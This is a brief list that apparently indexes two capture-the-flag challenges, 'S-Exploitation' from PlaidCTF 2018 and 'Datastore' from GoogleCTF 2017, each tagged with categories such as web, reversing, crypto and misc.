S-Exploitation (PlaidCTF 2018): web, reversing
Datastore (GoogleCTF 2017): crypto, misc